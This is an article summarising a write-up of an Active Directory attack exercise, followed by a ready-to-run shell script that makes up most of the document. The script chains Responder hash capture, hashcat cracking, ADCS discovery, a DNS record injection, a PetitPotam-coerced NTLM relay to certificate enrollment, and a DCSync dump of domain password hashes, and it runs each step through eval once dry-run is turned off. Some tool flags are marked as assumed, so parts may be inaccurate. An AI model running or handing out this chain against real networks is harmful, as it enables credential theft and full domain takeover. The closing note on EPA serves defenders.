This article summarizes Maverick's write-up of a recent Active Directory exploitation exercise. The write-up covers the techniques used against a Windows domain: reconnaissance, SMB share enumeration, NTLM hash capture, credential validation, credential dumping, NTLM relay against a vulnerable AD Certificate Services (ADCS) configuration using PetitPotam coercion, and privilege escalation to domain administrator. Affected: Active Directory, SMB, Windows environment
Keypoints:
- Maverick returns with another Active Directory write-up focused on infrastructure hacking.
- Uses Nmap to scan for open ports and services on the two targets, DC01 and WS01.
- Enumerates SMB shares on both machines to find potential attack vectors.
- Successfully captures an NTLM hash for the user KATHRYN.SPENCER.
- Validates captured credentials across multiple services including SMB and WinRM.
- Discovers a vulnerable AD Certificate Services (ADCS) configuration for potential exploitation.
- Escalates privileges with an NTLM relay attack: PetitPotam (MS-EFSRPC authentication coercion) forces a machine account to authenticate to the attacker's listener, and that authentication is relayed to the vulnerable ADCS configuration.
- Manipulates the domain's DNS records in support of the relay attack.
- Gains administrator access by authenticating with the certificate obtained through the relay, which carries the privileges of the account it was issued for.
- Highlights the importance of AD mapping with tools like BloodHound for understanding attack paths and vulnerabilities.
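The chain the key points describe, as an added example and not code from Maverick's write-up: recon with Nmap, unauthenticated share enumeration, NTLMv2 capture and cracking, credential validation over SMB and WinRM, an ADCS check, an ADIDNS record, and the PetitPotam-to-ADCS relay followed by certificate authentication and DCSync. Every hostname, IP address, account name and password below is an assumed placeholder (override them with environment variables); the CA web enrollment host is assumed to be DC01, the dnstool.py invocation follows the krbrelayx flag names as I know them, and the crack step assumes the captured hash is NTLMv2 (hashcat mode 5600). With DRY_RUN=1 (the default) the script only prints each command line, so it runs offline.

```shell
#!/bin/sh
# Added example, not from the original write-up. Each *_cmd function returns one
# command line; run_step prints it and, unless DRY_RUN=1, executes it.
# All hosts, IPs and credentials are ASSUMED placeholders.
set -eu

DRY_RUN="${DRY_RUN:-1}"
DOMAIN="${DOMAIN:-corp.local}"                     # assumed domain name
DC_IP="${DC_IP:-10.10.10.10}"                      # assumed DC01 address
WS_IP="${WS_IP:-10.10.10.11}"                      # assumed WS01 address
DC_HOST="${DC_HOST:-dc01.$DOMAIN}"
CA_HOST="${CA_HOST:-$DC_HOST}"                     # assumed: web enrollment lives on DC01
ATTACKER_IP="${ATTACKER_IP:-10.10.14.5}"           # assumed listener / relay address
LOWPRIV_USER="${LOWPRIV_USER:-kathryn.spencer}"
LOWPRIV_PASS="${LOWPRIV_PASS:-Passw0rd}"           # assumed cracked password

# 1. Recon: the AD-relevant ports on both hosts.
recon_cmd()      { printf '%s\n' "nmap -sV -p 88,135,139,389,445,464,636,3268,3269,5985 -oA ad_scan $DC_IP $WS_IP"; }
# 2. Unauthenticated share enumeration on DC01 and WS01.
shares_cmd()     { printf '%s\n' "netexec smb $DC_IP $WS_IP -u '' -p '' --shares"; }
# 3. Capture NTLMv2 from a host that authenticates to us (run in a separate phase;
#    Responder and ntlmrelayx both need port 445).
capture_cmd()    { printf '%s\n' "responder -I eth0"; }
crack_cmd()      { printf '%s\n' "hashcat -m 5600 captured_ntlmv2.txt /usr/share/wordlists/rockyou.txt"; }
# 4. Validate the recovered credentials over SMB and WinRM.
validate_cmd()   { printf '%s\n' "netexec smb $DC_IP $WS_IP -u '$LOWPRIV_USER' -p '$LOWPRIV_PASS' && netexec winrm $WS_IP -u '$LOWPRIV_USER' -p '$LOWPRIV_PASS'"; }
# 5. Look for a vulnerable ADCS configuration.
adcs_check_cmd() { printf '%s\n' "certipy find -u '$LOWPRIV_USER@$DOMAIN' -p '$LOWPRIV_PASS' -dc-ip $DC_IP -vulnerable"; }
# 6. Add an attacker-controlled record to the domain DNS (krbrelayx dnstool.py, flags assumed).
dns_cmd()        { printf '%s\n' "dnstool.py -u '$DOMAIN\\$LOWPRIV_USER' -p '$LOWPRIV_PASS' -r attacker.$DOMAIN -d $ATTACKER_IP -a add $DC_IP"; }
# 7. Relay listener targeting web enrollment, requesting a DomainController certificate.
relay_cmd()      { printf '%s\n' "impacket-ntlmrelayx -t http://$CA_HOST/certsrv/certfnsh.asp -smb2support --adcs --template DomainController"; }
# 8. Coerce DC01 to authenticate to the relay listener via MS-EFSRPC.
coerce_cmd()     { printf '%s\n' "python3 PetitPotam.py -u '$LOWPRIV_USER' -p '$LOWPRIV_PASS' -d $DOMAIN $ATTACKER_IP $DC_IP"; }
# 9. ntlmrelayx prints the certificate base64-encoded; decode it and get a TGT for DC01$.
auth_cmd()       { printf '%s\n' "base64 -d dc01.b64 > dc01.pfx && certipy auth -pfx dc01.pfx -dc-ip $DC_IP"; }
# 10. DCSync with the DC01$ ticket.
dcsync_cmd()     { printf '%s\n' "KRB5CCNAME=dc01.ccache impacket-secretsdump -k -no-pass -just-dc-ntlm '$DOMAIN/dc01\$@$DC_HOST'"; }

run_step() {
    label="$1"
    cmd="$("$2")"
    printf '[%s] %s\n' "$label" "$cmd"
    if [ "$DRY_RUN" != "1" ]; then
        eval "$cmd"
    fi
}

main() {
    run_step recon      recon_cmd
    run_step shares     shares_cmd
    run_step capture    capture_cmd
    run_step crack      crack_cmd
    run_step validate   validate_cmd
    run_step adcs-check adcs_check_cmd
    run_step dns        dns_cmd
    run_step relay      relay_cmd      # start in a second terminal before coercing
    run_step coerce     coerce_cmd
    run_step auth       auth_cmd
    run_step dcsync     dcsync_cmd
}

main
```

The relay listener and the coercion are separate processes in practice: start the relay first, then trigger PetitPotam, and only move on to the certificate step once ntlmrelayx reports a certificate for the DC01$ account. The relay step is also the one to check defensively: web enrollment reachable over plain HTTP with NTLM and without Extended Protection for Authentication is exactly the condition that makes the coerced machine authentication usable.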